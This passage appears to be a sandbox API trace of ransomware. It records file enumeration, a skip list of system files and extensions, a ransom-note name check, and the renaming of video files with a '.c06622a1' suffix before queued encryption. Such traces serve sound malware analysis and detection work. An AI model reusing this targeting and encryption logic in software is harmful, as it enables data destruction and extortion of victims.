(_String="scr") returned 0x3 [0168.528] _wcsicmp (_Str1="shs", _Str2="swf") returned -15 [0168.528] wcslen (_String="shs") returned 0x3 [0168.528] _wcsicmp (_Str1="spl", _Str2="swf") returned -7 [0168.528] wcslen (_String="spl") returned 0x3 [0168.528] _wcsicmp (_Str1="sys", _Str2="swf") returned 2 [0168.528] wcslen (_String="sys") returned 0x3 [0168.528] _wcsicmp (_Str1="theme", _Str2="swf") returned 1 [0168.528] wcslen (_String="theme") returned 0x5 [0168.528] _wcsicmp (_Str1="themepack", _Str2="swf") returned 1 [0168.528] wcslen (_String="themepack") returned 0x9 [0168.528] _wcsicmp (_Str1="wpx", _Str2="swf") returned 4 [0168.528] wcslen (_String="wpx") returned 0x3 [0168.528] _wcsicmp (_Str1="lock", _Str2="swf") returned -7 [0168.528] wcslen (_String="lock") returned 0x4 [0168.528] _wcsicmp (_Str1="key", _Str2="swf") returned -8 [0168.528] wcslen (_String="key") returned 0x3 [0168.528] _wcsicmp (_Str1="hta", _Str2="swf") returned -11 [0168.528] wcslen (_String="hta") returned 0x3 [0168.528] _wcsicmp (_Str1="msi", _Str2="swf") returned -6 [0168.529] wcslen (_String="msi") returned 0x3 [0168.529] _wcsicmp (_Str1="pdb", _Str2="swf") returned -3 [0168.529] wcslen (_String="pdb") returned 0x3 [0168.529] _wcsicmp (_Str1="sqlite", _Str2="swf") returned -6 [0168.529] wcslen (_String="sqlite") returned 0x6 [0168.529] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\swqjmzx2vptjg")) returned 0x10 [0168.529] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3240060 [0168.529] wcscpy (in: _Dest=0x3240060, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG" [0168.529] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG") returned 0x36 [0168.529] wcscpy (in: _Dest=0x32400ce, _Source="DAbKQ3xFcbi.swf" | out: _Dest="DAbKQ3xFcbi.swf") returned="DAbKQ3xFcbi.swf" [0168.529] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG\\DAbKQ3xFcbi.swf", dwFileAttributes=0x80) returned 1 [0168.529] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG\\DAbKQ3xFcbi.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\swqjmzx2vptjg\\dabkq3xfcbi.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0168.529] SetFilePointerEx (in: hFile=0x1d4, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0168.530] ReadFile (in: hFile=0x1d4, lpBuffer=0x32e9a4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ea34, lpOverlapped=0x0 | out: lpBuffer=0x32e9a4*, lpNumberOfBytesRead=0x32ea34*=0x90, lpOverlapped=0x0) returned 1 [0168.530] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e9a4, Length=0x80) returned 0xc224509f [0168.530] RtlComputeCrc32 (PartialCrc=0x509f, Buffer=0x32e9a4, Length=0x80) returned 0xea97f776 [0168.530] RtlComputeCrc32 (PartialCrc=0xf776, Buffer=0x32e9a4, Length=0x80) returned 0xf473e3e2 [0168.530] RtlComputeCrc32 (PartialCrc=0xe3e2, Buffer=0x32e9a4, Length=0x80) returned 0xe5668af5 [0168.530] RtlComputeCrc32 (PartialCrc=0x8af5, Buffer=0x32e9a4, Length=0x80) returned 0x7f9f8c27 [0168.530] CloseHandle (hObject=0x1d4) returned 1 [0168.531] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3250068 [0168.531] wcscpy (in: _Dest=0x3250068, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG\\DAbKQ3xFcbi.swf" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG\\DAbKQ3xFcbi.swf") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG\\DAbKQ3xFcbi.swf" [0168.531] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG\\DAbKQ3xFcbi.swf") returned 0x46 [0168.531] wcscpy (in: _Dest=0x32500f4, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0168.531] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG\\DAbKQ3xFcbi.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\swqjmzx2vptjg\\dabkq3xfcbi.swf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG\\DAbKQ3xFcbi.swf.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\swqjmzx2vptjg\\dabkq3xfcbi.swf.c06622a1"), dwFlags=0x8) returned 1 [0168.533] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG\\DAbKQ3xFcbi.swf.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\swqjmzx2vptjg\\dabkq3xfcbi.swf.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1d4 [0168.533] CreateIoCompletionPort (FileHandle=0x1d4, ExistingCompletionPort=0xd8, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0xd8 [0168.533] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x3dd0020 [0168.541] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4f9cdad3 [0168.541] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x22a9cde3 [0168.541] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x77992e [0168.541] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x505f6457 [0168.542] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x608503e8 [0168.542] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x1f4e55ef [0168.542] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x77973a87 [0168.542] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x1ce16525 [0168.545] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3dd0094, Length=0x80) returned 0xe0130ab4 [0168.545] RtlComputeCrc32 (PartialCrc=0xab4, Buffer=0x3dd0094, Length=0x80) returned 0xa83472bc [0168.545] RtlComputeCrc32 (PartialCrc=0x72bc, Buffer=0x3dd0094, Length=0x80) returned 0x96115f10 [0168.545] RtlComputeCrc32 (PartialCrc=0x5f10, Buffer=0x3dd0094, Length=0x80) returned 0xe3bb527 [0168.545] RtlComputeCrc32 (PartialCrc=0xb527, Buffer=0x3dd0094, Length=0x80) returned 0x7e8384bc [0168.545] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3dd0020) returned 1 [0168.545] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3240060) returned 1 [0168.545] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3250068) returned 1 [0168.545] FindNextFileW (in: hFindFile=0x154188, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd98d9440, ftCreationTime.dwHighDateTime=0x1d5e1f1, ftLastAccessTime.dwLowDateTime=0x13dbada0, ftLastAccessTime.dwHighDateTime=0x1d5dad9, ftLastWriteTime.dwLowDateTime=0x13dbada0, ftLastWriteTime.dwHighDateTime=0x1d5dad9, nFileSizeHigh=0x0, nFileSizeLow=0x4ba8, dwReserved0=0x0, dwReserved1=0x0, cFileName="HCHzihG6VHn2L_sCz.mp4", cAlternateFileName="HCHZIH~1.MP4")) returned 1 [0168.545] _wcsicmp (_Str1="HCHzihG6VHn2L_sCz.mp4", _Str2="README.c06622a1.TXT") returned -10 [0168.545] wcsstr (_Str="HCHzihG6VHn2L_sCz.mp4", _SubStr="README") returned 0x0 [0168.545] _wcsicmp (_Str1="autorun.inf", _Str2="HCHzihG6VHn2L_sCz.mp4") returned -7 [0168.545] wcslen (_String="autorun.inf") returned 0xb [0168.545] _wcsicmp (_Str1="boot.ini", _Str2="HCHzihG6VHn2L_sCz.mp4") returned -6 [0168.545] wcslen (_String="boot.ini") returned 0x8 [0168.545] _wcsicmp (_Str1="bootfont.bin", _Str2="HCHzihG6VHn2L_sCz.mp4") returned -6 [0168.545] wcslen (_String="bootfont.bin") returned 0xc [0168.545] _wcsicmp (_Str1="bootsect.bak", _Str2="HCHzihG6VHn2L_sCz.mp4") returned -6 [0168.545] wcslen (_String="bootsect.bak") returned 0xc [0168.545] _wcsicmp (_Str1="desktop.ini", _Str2="HCHzihG6VHn2L_sCz.mp4") returned -4 [0168.545] wcslen (_String="desktop.ini") returned 0xb [0168.546] _wcsicmp (_Str1="iconcache.db", _Str2="HCHzihG6VHn2L_sCz.mp4") returned 1 [0168.546] wcslen (_String="iconcache.db") returned 0xc [0168.546] _wcsicmp (_Str1="ntldr", _Str2="HCHzihG6VHn2L_sCz.mp4") returned 6 [0168.546] wcslen (_String="ntldr") returned 0x5 [0168.546] _wcsicmp (_Str1="ntuser.dat", _Str2="HCHzihG6VHn2L_sCz.mp4") returned 6 [0168.546] wcslen (_String="ntuser.dat") returned 0xa [0168.546] _wcsicmp (_Str1="ntuser.dat.log", _Str2="HCHzihG6VHn2L_sCz.mp4") returned 6 [0168.546] wcslen (_String="ntuser.dat.log") returned 0xe [0168.546] _wcsicmp (_Str1="ntuser.ini", _Str2="HCHzihG6VHn2L_sCz.mp4") returned 6 [0168.546] wcslen (_String="ntuser.ini") returned 0xa [0168.546] _wcsicmp (_Str1="thumbs.db", _Str2="HCHzihG6VHn2L_sCz.mp4") returned 12 [0168.546] wcslen (_String="thumbs.db") returned 0x9 [0168.546] _wcsicmp (_Str1="386", _Str2="mp4") returned -58 [0168.546] wcslen (_String="386") returned 0x3 [0168.546] _wcsicmp (_Str1="adv", _Str2="mp4") returned -12 [0168.546] wcslen (_String="adv") returned 0x3 [0168.546] _wcsicmp (_Str1="ani", _Str2="mp4") returned -12 [0168.546] wcslen (_String="ani") returned 0x3 [0168.546] _wcsicmp (_Str1="bat", _Str2="mp4") returned -11 [0168.546] wcslen (_String="bat") returned 0x3 [0168.546] _wcsicmp (_Str1="bin", _Str2="mp4") returned -11 [0168.546] wcslen (_String="bin") returned 0x3 [0168.546] _wcsicmp (_Str1="cab", _Str2="mp4") returned -10 [0168.546] wcslen (_String="cab") returned 0x3 [0168.546] _wcsicmp (_Str1="cmd", _Str2="mp4") returned -10 [0168.546] wcslen (_String="cmd") returned 0x3 [0168.546] _wcsicmp (_Str1="com", _Str2="mp4") returned -10 [0168.547] wcslen (_String="com") returned 0x3 [0168.547] _wcsicmp (_Str1="cpl", _Str2="mp4") returned -10 [0168.547] wcslen (_String="cpl") returned 0x3 [0168.547] _wcsicmp (_Str1="cur", _Str2="mp4") returned -10 [0168.547] wcslen (_String="cur") returned 0x3 [0168.547] _wcsicmp (_Str1="deskthemepack", _Str2="mp4") returned -9 [0168.547] wcslen (_String="deskthemepack") returned 0xd [0168.547] _wcsicmp (_Str1="diagcab", _Str2="mp4") returned -9 [0168.547] wcslen (_String="diagcab") returned 0x7 [0168.547] _wcsicmp (_Str1="diagcfg", _Str2="mp4") returned -9 [0168.547] wcslen (_String="diagcfg") returned 0x7 [0168.547] _wcsicmp (_Str1="diagpkg", _Str2="mp4") returned -9 [0168.547] wcslen (_String="diagpkg") returned 0x7 [0168.547] _wcsicmp (_Str1="dll", _Str2="mp4") returned -9 [0168.547] wcslen (_String="dll") returned 0x3 [0168.547] _wcsicmp (_Str1="drv", _Str2="mp4") returned -9 [0168.547] wcslen (_String="drv") returned 0x3 [0168.547] _wcsicmp (_Str1="exe", _Str2="mp4") returned -8 [0168.547] wcslen (_String="exe") returned 0x3 [0168.547] _wcsicmp (_Str1="hlp", _Str2="mp4") returned -5 [0168.547] wcslen (_String="hlp") returned 0x3 [0168.547] _wcsicmp (_Str1="icl", _Str2="mp4") returned -4 [0168.547] wcslen (_String="icl") returned 0x3 [0168.547] _wcsicmp (_Str1="icns", _Str2="mp4") returned -4 [0168.547] wcslen (_String="icns") returned 0x4 [0168.547] _wcsicmp (_Str1="ico", _Str2="mp4") returned -4 [0168.547] wcslen (_String="ico") returned 0x3 [0168.547] _wcsicmp (_Str1="ics", _Str2="mp4") returned -4 [0168.547] wcslen (_String="ics") returned 0x3 [0168.548] _wcsicmp (_Str1="idx", _Str2="mp4") returned -4 [0168.548] wcslen (_String="idx") returned 0x3 [0168.548] _wcsicmp (_Str1="ldf", _Str2="mp4") returned -1 [0168.548] wcslen (_String="ldf") returned 0x3 [0168.548] _wcsicmp (_Str1="lnk", _Str2="mp4") returned -1 [0168.548] wcslen (_String="lnk") returned 0x3 [0168.548] _wcsicmp (_Str1="mod", _Str2="mp4") returned -1 [0168.548] wcslen (_String="mod") returned 0x3 [0168.548] _wcsicmp (_Str1="mpa", _Str2="mp4") returned 45 [0168.548] wcslen (_String="mpa") returned 0x3 [0168.548] _wcsicmp (_Str1="msc", _Str2="mp4") returned 3 [0168.548] wcslen (_String="msc") returned 0x3 [0168.548] _wcsicmp (_Str1="msp", _Str2="mp4") returned 3 [0168.548] wcslen (_String="msp") returned 0x3 [0168.548] _wcsicmp (_Str1="msstyles", _Str2="mp4") returned 3 [0168.548] wcslen (_String="msstyles") returned 0x8 [0168.548] _wcsicmp (_Str1="msu", _Str2="mp4") returned 3 [0168.548] wcslen (_String="msu") returned 0x3 [0168.548] _wcsicmp (_Str1="nls", _Str2="mp4") returned 1 [0168.548] wcslen (_String="nls") returned 0x3 [0168.548] _wcsicmp (_Str1="nomedia", _Str2="mp4") returned 1 [0168.548] wcslen (_String="nomedia") returned 0x7 [0168.548] _wcsicmp (_Str1="ocx", _Str2="mp4") returned 2 [0168.548] wcslen (_String="ocx") returned 0x3 [0168.548] _wcsicmp (_Str1="prf", _Str2="mp4") returned 3 [0168.548] wcslen (_String="prf") returned 0x3 [0168.548] _wcsicmp (_Str1="ps1", _Str2="mp4") returned 3 [0168.548] wcslen (_String="ps1") returned 0x3 [0168.548] _wcsicmp (_Str1="rom", _Str2="mp4") returned 5 [0168.548] wcslen (_String="rom") returned 0x3 [0168.549] _wcsicmp (_Str1="rtp", _Str2="mp4") returned 5 [0168.549] wcslen (_String="rtp") returned 0x3 [0168.549] _wcsicmp (_Str1="scr", _Str2="mp4") returned 6 [0168.549] wcslen (_String="scr") returned 0x3 [0168.549] _wcsicmp (_Str1="shs", _Str2="mp4") returned 6 [0168.549] wcslen (_String="shs") returned 0x3 [0168.549] _wcsicmp (_Str1="spl", _Str2="mp4") returned 6 [0168.549] wcslen (_String="spl") returned 0x3 [0168.549] _wcsicmp (_Str1="sys", _Str2="mp4") returned 6 [0168.549] wcslen (_String="sys") returned 0x3 [0168.549] _wcsicmp (_Str1="theme", _Str2="mp4") returned 7 [0168.549] wcslen (_String="theme") returned 0x5 [0168.549] _wcsicmp (_Str1="themepack", _Str2="mp4") returned 7 [0168.549] wcslen (_String="themepack") returned 0x9 [0168.549] _wcsicmp (_Str1="wpx", _Str2="mp4") returned 10 [0168.549] wcslen (_String="wpx") returned 0x3 [0168.549] _wcsicmp (_Str1="lock", _Str2="mp4") returned -1 [0168.549] wcslen (_String="lock") returned 0x4 [0168.549] _wcsicmp (_Str1="key", _Str2="mp4") returned -2 [0168.549] wcslen (_String="key") returned 0x3 [0168.549] _wcsicmp (_Str1="hta", _Str2="mp4") returned -5 [0168.549] wcslen (_String="hta") returned 0x3 [0168.549] _wcsicmp (_Str1="msi", _Str2="mp4") returned 3 [0168.549] wcslen (_String="msi") returned 0x3 [0168.549] _wcsicmp (_Str1="pdb", _Str2="mp4") returned 3 [0168.549] wcslen (_String="pdb") returned 0x3 [0168.549] _wcsicmp (_Str1="sqlite", _Str2="mp4") returned 6 [0168.549] wcslen (_String="sqlite") returned 0x6 [0168.550] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\swqjmzx2vptjg")) returned 0x10 [0168.550] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3240060 [0168.550] wcscpy (in: _Dest=0x3240060, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG" [0168.550] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG") returned 0x36 [0168.550] wcscpy (in: _Dest=0x32400ce, _Source="HCHzihG6VHn2L_sCz.mp4" | out: _Dest="HCHzihG6VHn2L_sCz.mp4") returned="HCHzihG6VHn2L_sCz.mp4" [0168.550] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG\\HCHzihG6VHn2L_sCz.mp4", dwFileAttributes=0x80) returned 1 [0168.550] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG\\HCHzihG6VHn2L_sCz.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\swqjmzx2vptjg\\hchzihg6vhn2l_scz.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b4 [0168.550] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0168.550] ReadFile (in: hFile=0x1b4, lpBuffer=0x32e9a4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ea34, lpOverlapped=0x0 | out: lpBuffer=0x32e9a4*, lpNumberOfBytesRead=0x32ea34*=0x90, lpOverlapped=0x0) returned 1 [0168.551] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e9a4, Length=0x80) returned 0x9c4e2a0d [0168.551] RtlComputeCrc32 (PartialCrc=0x2a0d, Buffer=0x32e9a4, Length=0x80) returned 0x359a4700 [0168.551] RtlComputeCrc32 (PartialCrc=0x4700, Buffer=0x32e9a4, Length=0x80) returned 0x52139555 [0168.551] RtlComputeCrc32 (PartialCrc=0x9555, Buffer=0x32e9a4, Length=0x80) returned 0x568aa018 [0168.551] RtlComputeCrc32 (PartialCrc=0xa018, Buffer=0x32e9a4, Length=0x80) returned 0xf44b020c [0168.551] CloseHandle (hObject=0x1b4) returned 1 [0168.551] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3250068 [0168.551] wcscpy (in: _Dest=0x3250068, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG\\HCHzihG6VHn2L_sCz.mp4" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG\\HCHzihG6VHn2L_sCz.mp4") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG\\HCHzihG6VHn2L_sCz.mp4" [0168.551] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG\\HCHzihG6VHn2L_sCz.mp4") returned 0x4c [0168.551] wcscpy (in: _Dest=0x3250100, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0168.552] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG\\HCHzihG6VHn2L_sCz.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\swqjmzx2vptjg\\hchzihg6vhn2l_scz.mp4"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG\\HCHzihG6VHn2L_sCz.mp4.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\swqjmzx2vptjg\\hchzihg6vhn2l_scz.mp4.c06622a1"), dwFlags=0x8) returned 1 [0168.554] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG\\HCHzihG6VHn2L_sCz.mp4.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\swqjmzx2vptjg\\hchzihg6vhn2l_scz.mp4.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1b4 [0168.554] CreateIoCompletionPort (FileHandle=0x1b4, ExistingCompletionPort=0x130, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x130 [0168.554] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x3e60020 [0168.561] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x49c62605 [0168.561] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x336218da [0168.561] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x77e65230 [0168.562] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x1996fe9b [0168.562] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0xd440719 [0168.562] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x53051279 [0168.562] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x15a93bef [0168.562] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x56863417 [0168.565] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3e60094, Length=0x80) returned 0x66aa4f8c [0168.565] RtlComputeCrc32 (PartialCrc=0x4f8c, Buffer=0x3e60094, Length=0x80) returned 0x58a6a758 [0168.565] RtlComputeCrc32 (PartialCrc=0xa758, Buffer=0x3e60094, Length=0x80) returned 0xe36ea3b4 [0168.565] RtlComputeCrc32 (PartialCrc=0xa3b4, Buffer=0x3e60094, Length=0x80) returned 0xc11d0741 [0168.565] RtlComputeCrc32 (PartialCrc=0x741, Buffer=0x3e60094, Length=0x80) returned 0xf84bb9cd [0168.565] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3e60020) returned 1 [0168.565] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3240060) returned 1 [0168.565] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3250068) returned 1 [0168.565] FindNextFileW (in: hFindFile=0x154188, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7b15a6d0, ftCreationTime.dwHighDateTime=0x1d5e036, ftLastAccessTime.dwLowDateTime=0x98fc9b30, ftLastAccessTime.dwHighDateTime=0x1d5e28f, ftLastWriteTime.dwLowDateTime=0x98fc9b30, ftLastWriteTime.dwHighDateTime=0x1d5e28f, nFileSizeHigh=0x0, nFileSizeLow=0x13591, dwReserved0=0x0, dwReserved1=0x0, cFileName="MJ1ddR.swf", cAlternateFileName="")) returned 1 [0168.565] _wcsicmp (_Str1="MJ1ddR.swf", _Str2="README.c06622a1.TXT") returned -5 [0168.565] wcsstr (_Str="MJ1ddR.swf", _SubStr="README") returned 0x0 [0168.565] _wcsicmp (_Str1="autorun.inf", _Str2="MJ1ddR.swf") returned -12 [0168.565] wcslen (_String="autorun.inf") returned 0xb [0168.565] _wcsicmp (_Str1="boot.ini", _Str2="MJ1ddR.swf") returned -11 [0168.565] wcslen (_String="boot.ini") returned 0x8 [0168.565] _wcsicmp (_Str1="bootfont.bin", _Str2="MJ1ddR.swf") returned -11 [0168.565] wcslen (_String="bootfont.bin") returned 0xc [0168.565] _wcsicmp (_Str1="bootsect.bak", _Str2="MJ1ddR.swf") returned -11 [0168.566] wcslen (_String="bootsect.bak") returned 0xc [0168.566] _wcsicmp (_Str1="desktop.ini", _Str2="MJ1ddR.swf") returned -9 [0168.566] wcslen (_String="desktop.ini") returned 0xb [0168.566] _wcsicmp (_Str1="iconcache.db", _Str2="MJ1ddR.swf") returned -4 [0168.566] wcslen (_String="iconcache.db") returned 0xc [0168.566] _wcsicmp (_Str1="ntldr", _Str2="MJ1ddR.swf") returned 1 [0168.566] wcslen (_String="ntldr") returned 0x5 [0168.566] _wcsicmp (_Str1="ntuser.dat", _Str2="MJ1ddR.swf") returned 1 [0168.566] wcslen (_String="ntuser.dat") returned 0xa [0168.566] _wcsicmp (_Str1="ntuser.dat.log", _Str2="MJ1ddR.swf") returned 1 [0168.566] wcslen (_String="ntuser.dat.log") returned 0xe [0168.566] _wcsicmp (_Str1="ntuser.ini", _Str2="MJ1ddR.swf") returned 1 [0168.566] wcslen (_String="ntuser.ini") returned 0xa [0168.566] _wcsicmp (_Str1="thumbs.db", _Str2="MJ1ddR.swf") returned 7 [0168.566] wcslen (_String="thumbs.db") returned 0x9 [0168.566] _wcsicmp (_Str1="386", _Str2="swf") returned -64 [0168.566] wcslen (_String="386") returned 0x3 [0168.566] _wcsicmp (_Str1="adv", _Str2="swf") returned -18 [0168.566] wcslen (_String="adv") returned 0x3 [0168.566] _wcsicmp (_Str1="ani", _Str2="swf") returned -18 [0168.566] wcslen (_String="ani") returned 0x3 [0168.566] _wcsicmp (_Str1="bat", _Str2="swf") returned -17 [0168.566] wcslen (_String="bat") returned 0x3 [0168.566] _wcsicmp (_Str1="bin", _Str2="swf") returned -17 [0168.566] wcslen (_String="bin") returned 0x3 [0168.566] _wcsicmp (_Str1="cab", _Str2="swf") returned -16 [0168.566] wcslen (_String="cab") returned 0x3 [0168.567] _wcsicmp (_Str1="cmd", _Str2="swf") returned -16 [0168.567] wcslen (_String="cmd") returned 0x3 [0168.567] _wcsicmp (_Str1="com", _Str2="swf") returned -16 [0168.567] wcslen (_String="com") returned 0x3 [0168.567] _wcsicmp (_Str1="cpl", _Str2="swf") returned -16 [0168.567] wcslen (_String="cpl") returned 0x3 [0168.567] _wcsicmp (_Str1="cur", _Str2="swf") returned -16 [0168.567] wcslen (_String="cur") returned 0x3 [0168.567] _wcsicmp (_Str1="deskthemepack", _Str2="swf") returned -15 [0168.567] wcslen (_String="deskthemepack") returned 0xd [0168.567] _wcsicmp (_Str1="diagcab", _Str2="swf") returned -15 [0168.567] wcslen (_String="diagcab") returned 0x7 [0168.567] _wcsicmp (_Str1="diagcfg", _Str2="swf") returned -15 [0168.567] wcslen (_String="diagcfg") returned 0x7 [0168.567] _wcsicmp (_Str1="diagpkg", _Str2="swf") returned -15 [0168.567] wcslen (_String="diagpkg") returned 0x7 [0168.567] _wcsicmp (_Str1="dll", _Str2="swf") returned -15 [0168.567] wcslen (_String="dll") returned 0x3 [0168.567] _wcsicmp (_Str1="drv", _Str2="swf") returned -15 [0168.567] wcslen (_String="drv") returned 0x3 [0168.567] _wcsicmp (_Str1="exe", _Str2="swf") returned -14 [0168.567] wcslen (_String="exe") returned 0x3 [0168.567] _wcsicmp (_Str1="hlp", _Str2="swf") returned -11 [0168.567] wcslen (_String="hlp") returned 0x3 [0168.567] _wcsicmp (_Str1="icl", _Str2="swf") returned -10 [0168.567] wcslen (_String="icl") returned 0x3 [0168.567] _wcsicmp (_Str1="icns", _Str2="swf") returned -10 [0168.568] wcslen (_String="icns") returned 0x4 [0168.568] _wcsicmp (_Str1="ico", _Str2="swf") returned -10 [0168.568] wcslen (_String="ico") returned 0x3 [0168.568] _wcsicmp 